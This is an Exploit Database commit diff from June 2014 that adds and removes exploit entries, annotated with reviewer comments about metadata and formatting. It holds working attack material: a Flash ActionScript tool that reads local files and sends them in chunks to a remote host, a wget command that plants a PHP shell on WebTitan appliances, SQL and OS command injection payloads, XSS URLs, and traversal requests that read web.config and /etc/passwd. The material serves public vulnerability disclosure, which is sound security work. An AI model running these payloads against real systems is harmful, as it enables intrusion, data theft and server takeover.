Updated 06_11_2014

Offensive Security 2014-06-11 04:38:08 +00:00
parent f8588487ce
commit 9317b28542
10 changed files with 540 additions and 59 deletions


@ -9834,7 +9834,7 @@ id,file,description,date,author,platform,type,port
10604,platforms/php/webapps/10604.pl,"Simple PHP Blog 0.5.1 - Local File Inclusion Vulnerability",2009-12-22,jgaliana,php,webapps,0
10606,platforms/php/webapps/10606.txt,"weenCompany SQL Injection Vulnerability",2009-12-22,Gamoscu,php,webapps,0
10609,platforms/php/webapps/10609.txt,"Aurora CMS Remote SQL Injection Exploit",2009-12-22,Sora,php,webapps,0
10610,platforms/linux/remote/10610.rb,"CoreHTTP Arbitrary Command Execution Vulnerability",2009-12-23,"Aaron Conole",linux,remote,0
10610,platforms/linux/remote/10610.rb,"CoreHTTP 0.5.3.1 (CGI) - Arbitrary Command Execution Vulnerability",2009-12-23,"Aaron Conole",linux,remote,0
10611,platforms/php/webapps/10611.txt,"35mm Slide Gallery Cross Site Scripting Vulnerability",2009-12-23,indoushka,php,webapps,0
10612,platforms/php/webapps/10612.txt,"Add An Ad Script Remote File Upload",2009-12-23,MR.Z,php,webapps,0
10613,platforms/linux/local/10613.c,"2.6.18-20 2009 Local Root Exploit",2009-12-23,DigitALL,linux,local,0
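Review bot: the commit message "Updated 06_11_2014" does not record that the 10610 index row is being edited rather than added; a one-line note that the description gains the affected version and component (`CoreHTTP 0.5.3.1 (CGI) - Arbitrary Command Execution Vulnerability`) would make this metadata fix findable in history. The new wording follows the `Product Version - Issue` pattern used by the 2014 rows added further down in this commit, which is the right direction.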
@ -30335,8 +30335,6 @@ id,file,description,date,author,platform,type,port
33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection Vulnerability",2010-02-19,"Sjoerd Resink",multiple,remote,0
33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0
33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0
33667,platforms/php/webapps/33667.txt,"Wordpress Theme Elegance - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
33668,platforms/php/webapps/33668.txt,"Wordpress Theme Infocus - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0
33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0
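Review bot: the two removed index rows (33667 and 33668, the Elegance and Infocus dl-skin.php local file disclosure entries) carry no reason for removal in the commit message; whether they were withdrawn as duplicates, as unverified, or at the author's request should be recorded, because a published ID that silently disappears leaves anyone who referenced EDB-33667 without an explanation. The removal is at least consistent with the deletion of both platforms/php/webapps files further down in this commit.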
@ -30352,3 +30350,10 @@ id,file,description,date,author,platform,type,port
33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 '_SESSION[dede_admin_id]' Parameter Authentication Bypass Vulnerability",2010-03-01,"Wolves Security Team",php,webapps,0
33686,platforms/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 'readme.nsf' Cross Site Scripting Vulnerability",2010-03-02,"Nahuel Grisolia",multiple,remote,0
33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQMS Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0
33688,platforms/php/webapps/33688.txt,"Discuz! 6.0 'uid' Parameter Cross Site Scripting Vulnerability",2010-03-02,"lis cker",php,webapps,0
33689,platforms/multiple/remote/33689.as,"Adobe Flash Player <= 10.1.51 Local File Access Information Disclosure Vulnerability",2010-03-03,"lis cker",multiple,remote,0
33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 Remote File Upload Vulnerability",2010-03-03,indoushka,php,webapps,0
33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation 'error_msg_parameter' Cross Site Scripting Vulnerability",2010-03-04,thebluegenius,jsp,webapps,0
33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80
33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80
33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 to 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80
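Review bot: the three added rows set the port column to 80 while every neighbouring php/webapps row uses 0; if 80 is now the convention for web application entries, that change of convention deserves a note, otherwise these should be 0 for consistency. Also, the date column for 33697, 33699 and 33700 is 2014-06-09 while the advisories themselves are dated 05 June, 06 June and 05 June 2014; that is fine if the column records the archive publication date, but the header `id,file,description,date,author,platform,type,port` does not say which date it holds.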


platforms/asp/webapps/33700.txt Executable file

@ -0,0 +1,137 @@
Advisory: Directory Traversal in DevExpress ASP.NET File Manager
During a penetration test RedTeam Pentesting discovered a directory
traversal vulnerability in DevExpress' ASP.NET File Manager and File
Upload. Attackers are able to read arbitrary files by specifying a
relative path.
Details
=======
Product: DevExpress ASPxFileManager Control for WebForms and MVC
Affected Versions: DevExpress ASPxFileManager v10.2 to v13.2.8
Fixed Versions: DevExpress ASPxFileManager v13.2.9
Vulnerability Type: Directory Traversal
Security Risk: high
Vendor URL:
https://www.devexpress.com/Products/NET/Controls/ASP/File-Upload-Explorer/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-006
Advisory Status: published
CVE: CVE-2014-2575
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2575
Introduction
============
"The DevExpress ASP.NET Subscription includes a standalone Multi-File
Upload Manager for WebForms and MVC and a pre-built File Manager for
WebForms; built so you can instantly introduce file management
capabilities in your next web application."
(from DevExpress' Homepage)
More Details
============
The ASPX File Manager component is prone to a directory traversal
vulnerability. Attackers with access to the File Manager component can
read arbitrary files on the same partition as the shared directory.
A common request to download a file via the File Manager component
requires multiple HTTP-Post parameters:
__EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1
__EVENTARGUMENT=13%7C<file.ext>
__EVENTVALID=
The parameter __EVENTARGUMENT=13|<file.ext> specifies a file download
and the file which is to be downloaded. Attackers may also request files
outside of the shared directory by prepending a relative path to a
parent directory.
Proof of Concept
================
By requesting files with a relative path, files otherwise not available
will be accessible through the File Manager component. Depending on the
shared directory and the webserver configuration, the webserver
configuration file might for example be accessible through the File
Manager component:
__EVENTARGUMENT=13|../../web.config
Other sensitive operating system files could be affected, too.
Example exploit:
------------------------------------------------------------------------
curl --data __EVENTTARGET=ctl00%24ContentPlaceHolder1%24ASPxFileManager1\
"&__EVENTARGUMENT=13%7C../../web.config&=&__EVENTVALID" \
http://example.com/FileManagerComponent.aspx
------------------------------------------------------------------------
The request above will download the specified file.
Workaround
==========
Instead of a physical file system provider, a database file system
provider with limited access permissions could be used.
Fix
===
Update ASPxFileManager control to DevExpress libraries version v13.2.9.
Security Risk
=============
The risk is estimated to be high. This vulnerability allows attackers to
access arbitrary files on the same partition as the File Manager's root
directory. This may allow attackers to read sensitive information like
the webserver configuration.
Timeline
========
2014-03-10 Vulnerability identified
2014-03-21 Customer approved disclosure to vendor
2014-03-21 CVE number requested and assigned
2014-03-25 Vendor notified
2014-04-11 Customer opened support ticket with vendor
2014-04-17 Vendor released fixed version
2014-04-17 Vendor released security advisory to customers
2014-06-05 Advisory released
References
==========
Vendor Security Advisory:
http://security.devexpress.com/de7c4756/?id=ff8c1703126f4717993ac3608a65a2e2
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.
-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen
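Review bot: the last line of the file runs the entire multi-line signature block (company name, phone, fax, address, court registration and managing directors) onto a single line, which does not match the published advisory and reads as an extraction error; it should be restored to the original line breaks before archiving. Everything a defender needs is otherwise present and consistent: affected versions v10.2 to v13.2.8, fixed version v13.2.9, CVE-2014-2575, and the workaround of using a database file system provider with limited permissions instead of a physical file system provider.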


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/38534/info
Comptel Provisioning and Activation is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/sas5/index.jsp?error_msg_parameter=%3CScRiPt%3Ealert%28%27XSS%27%29%3C/ScRiPt%3E
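Review bot: the entry records only the BID summary and a single PoC URL; the affected product version is not stated anywhere in the file, and the index row for 33691 has no version either, so readers cannot tell which Comptel Provisioning and Activation releases are affected or whether a fix exists. If the BID page carries a version range or a vendor fix reference, it should be copied into the file next to the `source:` line.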


@ -0,0 +1,189 @@
source: http://www.securityfocus.com/bid/38517/info
Adobe Flash Player is prone to an information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
package com.lavakumar.imposter{
import com.dynamicflash.util.Base64;
import flash.display.MovieClip;
import flash.display.Stage;
import flash.text.TextField;
import flash.events.Event;
import flash.events.DataEvent;
import flash.events.IOErrorEvent;
import flash.events.ProgressEvent;
import flash.events.SecurityErrorEvent;
import flash.events.HTTPStatusEvent;
import flash.utils.ByteArray;
import flash.net.URLLoader;
import flash.net.URLRequest;
import flash.net.URLLoaderDataFormat;
public class Main extends MovieClip {
var filecontent:String="";
var read:int=0;
var inputcount:int=0;
var filecounter:int=0;
var files:Array;
var statuscode:int=1;
public function Main() {
addEventListener(Event.ENTER_FRAME, check, false, 0, true);
}
public function check(e:Event):void {
if (statuscode==1) {
get();
} else if (statuscode==2) {
load();
} else if (statuscode==3) {
send();
}
}
public function get():void {
var getter:URLLoader = new URLLoader();
getter.dataFormat=URLLoaderDataFormat.BINARY;
getter.addEventListener(Event.COMPLETE, get_FileLoaded);
getter.addEventListener(IOErrorEvent.IO_ERROR, get_FileIoError);
getter.addEventListener(Event.OPEN, get_FileOpened);
getter.addEventListener(ProgressEvent.PROGRESS, get_FileProgress);
getter.addEventListener(SecurityErrorEvent.SECURITY_ERROR, get_FileSecurityError);
getter.addEventListener(HTTPStatusEvent.HTTP_STATUS, get_FileStatus);
getter.addEventListener(DataEvent.DATA, get_DataEventHandler);
var inputfile:URLRequest=new URLRequest("//192.168.1.3/imp/imposter"+inputcount.toString()+".input");
statuscode=0;
getter.load(inputfile);
}
public function load():void {
var loader:URLLoader = new URLLoader();
loader.dataFormat=URLLoaderDataFormat.BINARY;
loader.addEventListener(Event.COMPLETE, load_FileLoaded);
loader.addEventListener(IOErrorEvent.IO_ERROR, load_FileIoError);
loader.addEventListener(Event.OPEN, load_FileOpened);
loader.addEventListener(ProgressEvent.PROGRESS, load_FileProgress);
loader.addEventListener(SecurityErrorEvent.SECURITY_ERROR, load_FileSecurityError);
loader.addEventListener(HTTPStatusEvent.HTTP_STATUS, load_FileStatus);
loader.addEventListener(DataEvent.DATA, load_DataEventHandler);
if (filecounter<files.length) {
var filename:String=files[filecounter];
filecounter++;
var file:URLRequest=new URLRequest(filename);
statuscode=0;
loader.load(file);
} else {
statuscode=1;
}
}
public function send():void {
if (read<filecontent.length) {
var temp:String;
var sendurl:String="";
if ((filecontent.length - read) < 200) {
temp=filecontent.substr(read);
var regex:RegExp=/\//g;
temp=temp.replace(regex,"-");
sendurl="//192.168.1.3/imp/is_"+filecounter+"_"+read+"_"+filecontent.length+"_"+temp;
read=filecontent.length;
} else {
temp=filecontent.substr(read,200);
var regex:RegExp=/\//g;
temp=temp.replace(regex,"-");
sendurl="//192.168.1.3/imp/is_"+filecounter+"_"+read+"_"+filecontent.length+"_"+temp;
read=read+200;
}
var senddata:URLRequest=new URLRequest(sendurl);
var sender:URLLoader = new URLLoader();
sender.dataFormat=URLLoaderDataFormat.BINARY;
sender.addEventListener(Event.COMPLETE, send_FileLoaded);
sender.addEventListener(IOErrorEvent.IO_ERROR, send_FileIoError);
sender.addEventListener(Event.OPEN, send_FileOpened);
sender.addEventListener(ProgressEvent.PROGRESS, send_FileProgress);
sender.addEventListener(SecurityErrorEvent.SECURITY_ERROR, send_FileSecurityError);
sender.addEventListener(HTTPStatusEvent.HTTP_STATUS, send_FileStatus);
sender.addEventListener(DataEvent.DATA, send_DataEventHandler);
sender.load(senddata);
} else {
read=0;
statuscode=2;
}
}
function load_FileLoaded(event:Event):void {
var loader:URLLoader=event.target as URLLoader;
var data:ByteArray=loader.data as ByteArray;
filecontent=Base64.encodeByteArray(data);
data=null;
statuscode=3;
}
function load_FileOpened(event:Event):void {
var loader:URLLoader=event.target as URLLoader;
}
function load_DataEventHandler(event:Event):void {
}
function load_FileProgress(event:flash.events.ProgressEvent):void {
}
function load_FileSecurityError(event:Event):void {
statuscode=2;
}
function load_FileIoError(event:Event):void {
statuscode=2;
}
function load_FileStatus(event:HTTPStatusEvent):void {
}
function load_FileNotFound(event:IOErrorEvent):void {
statuscode=2;
}
function get_FileLoaded(event:Event):void {
var getter:URLLoader=event.target as URLLoader;
var data:String=event.target.data;
if (data.length>0) {
files=data.split(',');
if (files.length>0) {
statuscode=2;
inputcount++;
} else {
statuscode=1;
}
} else {
statuscode=1;
}
}
function get_FileOpened(event:Event):void {
}
function get_DataEventHandler(event:Event):void {
}
function get_FileProgress(event:flash.events.ProgressEvent):void {
}
function get_FileSecurityError(event:Event):void {
statuscode=1;
}
function get_FileIoError(event:Event):void {
statuscode=1;
}
function get_FileStatus(event:HTTPStatusEvent):void {
}
function get_FileNotFound(event:IOErrorEvent):void {
statuscode=1;
}
function send_FileLoaded(event:Event):void {
}
function send_FileOpened(event:Event):void {
}
function send_DataEventHandler(event:Event):void {
}
function send_FileProgress(event:flash.events.ProgressEvent):void {
}
function send_FileSecurityError(event:Event):void {
}
function send_FileIoError(event:Event):void {
}
function send_FileStatus(event:HTTPStatusEvent):void {
}
function send_FileNotFound(event:IOErrorEvent):void {
}
}
}
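Review bot: the archived ActionScript is not self-contained and the file does not say so: it imports `com.dynamicflash.util.Base64`, which is neither part of the Flash API nor included in this commit, and it hard-codes the author's test host `//192.168.1.3/imp/` in `get()` and `send()`. A short header comment recording the external dependency and stating that the host is the author's lab address would save archive readers from treating it as part of the advisory. The two sentences at the top are the BID summary rather than a description of the technique, so the file also lacks the affected-version statement (`<= 10.1.51`) that only the index row carries.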


@ -1,24 +0,0 @@
[+] Post Local File Disclosure in wordpress theme Elegance
[+] Date: 07/06/2014
[+] CWE Number: CWE-98
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Dork:inurl:"/wp-content/themes/elegance/"
[+] Vendor Homepage: http://www.elegantthemes.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: dl-skin.php
[+] Exploit :
<html>
<body>
<form action="http://www.site.com/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
eof
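Review bot: this file is deleted outright, together with its index row above, but the commit message gives no reason; a withdrawn exploit-db entry is normally marked as removed or superseded rather than silently dropped. The content being removed is a plain HTML form posting `_mysite_download_skin=/etc/passwd` to `lib/scripts/dl-skin.php`; if the reason was that the issue belongs to a shared theme library rather than to the Elegance theme specifically, or that it duplicates the Infocus entry removed next, that deserves a line in the log.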


@ -1,32 +0,0 @@
[+] Post Local File Disclosure in wordpress theme Infocus
[+] Date: 07/06/2014
[+] CWE Number: CWE-98
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Dork:inurl:"/wp-content/themes/infocus/"
[+] Vendor Homepage: http://themeforest.net/item/infocus-powerful-professional-wordpress-theme/85486
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: dl-skin.php
[+] Exploit :
<html>
<body>
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
eof
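Review bot: the same unexplained removal as the Elegance entry. This file differs from it only in the theme path (`/wp-content/themes/infocus/lib/scripts/dl-skin.php`) and the Vendor Homepage, which suggests the two were withdrawn together as a pair and could be logged as one decision.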


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38484/info
Discuz! is prone to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Discuz! 6.0.0 is vulnerable; other versions may also be affected.
http://www.example.com:80/eccredit.php?action=list&uid="><script>alert(/Liscker/);</script>
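Review bot: the file states `Discuz! 6.0.0 is vulnerable; other versions may also be affected` while the index row describes the entry as `Discuz! 6.0`; minor, but the row and the file should agree on the version string so searches on either form find the entry.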

platforms/php/webapps/33690.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/38527/info
DosyaYukle Scripti is prone to a remote file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.
Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
DosyaYukle Scripti 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/dosyayukle/
http://www.example.com/dosyayukle/dosyalar/ch99.php
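Review bot: the entry names no upload endpoint or parameter, only the application directory and the path where an uploaded PHP file (`dosyalar/ch99.php`) ends up, so as an archive record it documents the consequence rather than the flaw, and the `source:` BID line is the only reference for anyone verifying it. From the defensive side the record is still useful: the `dosyalar/` directory being served as executable PHP is the condition to check for, and PHP files appearing there are the indicator.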

platforms/php/webapps/33697.txt Executable file

@ -0,0 +1,23 @@
?# Exploit Title: Persistent Cross Site Scripting Vulnerability in eFront
3.6.14.4
# Date: 05 June 2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: http://www.efrontlearning.net
# Software Link:
https://sourceforge.net/projects/efrontlearning/files/latest/download
# Version: 3.6.14.4
# Tested on: Windows 7
#################################################
eFront 3.6.14.4 is vulnerable for a Persistent Cross Site Scripting
Vulnerability.
The vulnerability affects 'surname' parameter(Last Name Field) while
updating the account details.
Vendor has supplied a workaround for the vulnerability which can be found
at
https://github.com/epignosis/efront_open_source/issues/5
#################################################
Greetz : oldmanlab, Jinen Patel
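Review bot: the first line begins with a stray `?` before `# Exploit Title:`, most likely a UTF-8 BOM or mail-client artifact, and the Title and Software Link fields are wrapped mid-value onto the following line (`3.6.14.4`, the sourceforge URL); both should be cleaned up so each `#` header line holds one complete field. The body is fine: affected version 3.6.14.4, the `surname` parameter on account update, and a link to the vendor's workaround in GitHub issue 5 of epignosis/efront_open_source.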

platforms/php/webapps/33699.txt Executable file

@ -0,0 +1,157 @@
SEC Consult Vulnerability Lab Security Advisory < 20140606-0 >
=======================================================================
title: Multiple critical vulnerabilities
product: WebTitan
vulnerable version: 4.01 (Build 68)
fixed version: 4.04
impact: critical
homepage: http://www.webtitan.com
found: 2014-04-07
by: Robert Giruckas, Mindaugas Liudavicius
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"WebTitan offers ultimate protection from internet based threats and powerful
web filtering functionalities to SMBs, Service Providers and Education sectors
around the World."
Source: http://www.webtitan.com/about-us/webtitan
Business recommendation:
------------------------
Multiple critical security vulnerabilities have been identified in the WebTitan
system. Exploiting these vulnerabilities potential attackers could take control
over the entire system.
It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1) SQL Injection
A SQL injection vulnerability in the /categories-x.php script allows
unauthenticated remote attackers to execute arbitrary SQL commands via the
"sortkey" parameter.
2) Remote command execution
Multiple remote command execution vulnerabilities were detected in the
WebTitan GUI. This security flaw exists due to lack of input validation. An
authenticated attacker of any role (Administrator, Policy Manager, Report
Manager) can execute arbitrary OS commands with the privileges of the web
server.
3) Path traversal
The web GUI fails to properly filter user input passed to the logfile
parameter. This leads to arbitrary file download by unauthenticated attackers.
4) Unprotected Access
The web GUI does not require authentication for certain PHP scripts. This
security issue allows an unauthenticated remote attacker to download Webtitan
configuration backup (including hashed user credentials) to the attacker's FTP
server.
Proof of concept:
-----------------
1) SQL Injection
The manipulation of the "sortkey" parameter allows users to modify the
original SQL query.
GET /categories-x.php HTTP/1.1
/categories-x.php?getcategories&sortkey=name) limit 1;--
/categories-x.php?getcategories&sortkey=name) limit 5;--
2) Remote command execution
Due to improper user input validation it is possible to inject arbitrary OS
commands using backticks ``. Some of the affected files do not sanitize any
type of shell metacharacters, this allows an attacker to use more flexible OS
commands. Tested and working payload for most scripts: `/usr/local/bin/wget
http://<URL to shell script> -O /usr/blocker/www/graph/CPU/xshell.php`
Affected scripts: logs-x.php, users-x.php, support-x.php, time-x.php,
scheduledreports-x.php, reporting-x.php, network-x.php
a. logs-x.php, vulnerable parameters: fname, logfile
/logs-x.php?jaction=view&fname=webtitan.log;ls -la
/logs-x.php POST Content: jaction=delete&logfile=<PAYLOAD>
b. users-x.php, vulnerable parameters: ldapserver
/users-x.php?findLdapDC=1&ldapserver=<PAYLOAD>
c. support-x.php, vulnerable parameters: tracehost, dighost, pinghost
/support-x.php POST Content: jaction=ping&pinghost=<PAYLOAD>
/support-x.php POST Content: jaction=ping&dighost=<PAYLOAD>
/support-x.php POST Content: jaction=ping&tracehost=<PAYLOAD>
d. time-x.php, vulnerable parameters: ntpserversList
/time-x.php POST Content:
jaction=ntpSync&timezone=Europe%2FLondon&ntp=1&ntpservers_entry=&date_month=4&date_day=8&date_year=2014&h_time=9&m_time=57&ntpserversList=<PAYLOAD>
e. scheduledreports-x.php, vulnerable parameters: reportid
/scheduledreports-x.php?runReport=1&reportid=<PAYLOAD>
f. reporting-x.php, vulnerable parameter: delegated_admin
/reporting-x.php POST Content:
jaction=exportpdf&report=r_requests_user&period=period_today&uid=0&sourceip=0&urlid=0&groupid=0&categoryid=0&domain=&chart=pie&reporthtml=&reportid=1396860686&rowsperpage=10&currentpage=1&startdate=1396843200&enddate=1396929599&reportfilter=f_0&delegated_admin=admin';<PAYLOAD>'&gotopage=1
g. network-x.php, vulnerable parameters: hostname (limited to 15 symbols
length), domain
jaction=saveHostname&hostname=`root`
jaction=saveDNS&domain=domain.com;<PAYLOAD>&dnsservers=192.168.0.1-:-
3) Path traversal
Due to missing input filtering in the logs-x.php script it is possible to
download arbitrary files without any authentication:
Vulnerable parameters: logfile
Post Content: jaction=download&logfile=../../../etc/passwd
4) Unprotected Access
a. Since the script backup-x.php does not require authentication, remote
attackers can initiate a backup of Webtitan configuration files to a remote
FTP server by executing the following requests:
/backup-x.php
POST Content:
jaction=saveFTP&jstatus=&schedule=1&frequency=daily&hour=16&minute=38&day_of_week=Mon&day_of_month=1&ftpserver=<IP>&ftplogin=<login>&ftppassword=<pw>&ftplocation=<path>
Where <IP> is the remote FTP server IP, <login> - remote FTP server
login, <password> - remote FTP, <path> - path where to store backup
With the next request, an attacker can force the backup to be uploaded
to the attacker's FTP server:
/backup-x.php
POST Content: jaction=exportNowtoFtp
b. The autoconf-x.php, contentfiltering-x.php, license-x.php, msgs.php,
reports-drill.php scripts can be reached by an unauthenticated user. The
categories-x.php, urls-x.php can also be accessed by faking the HTTP User-Agent
header, by setting it to "Shockwave Flash".
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the WebTitan VMware
appliance ver. 4.0.1 (build 68). It is assumed that previous versions are
affected too.
Vendor contact timeline:
------------------------
2014-04-17: Contacting vendor through info@webtitan.com and helpdesk@webtitan.com
2014-04-23: Vendor is investigating the vulnerabilities
2014-05-09: Vendor is testing security patches
2014-06-03: Vendor releases the version 4.04 of WebTitan
2014-06-06: SEC Consult releases a coordinated security advisory
Solution:
> -------- Update to the most recent version 4.04 of WebTitan. Workaround: ----------- Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF Mindaugas Liudavicius / @2014
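Review bot: the final line collapses the whole tail of the advisory (the Solution text `Update to the most recent version 4.04 of WebTitan`, an empty Workaround section, the Advisory URL, and the SEC Consult signature block) onto one `>`-prefixed line; it should be restored to the original section layout so the Solution is readable in the archive. Two smaller consistency points: the header says `vulnerable version: 4.01 (Build 68)` while the tested-versions section says `ver. 4.0.1 (build 68)`, and the SQL injection PoC shows a `GET /categories-x.php HTTP/1.1` request line followed by two bare query strings, which reads as an excerpt with the request line and query parameters merged rather than as one request.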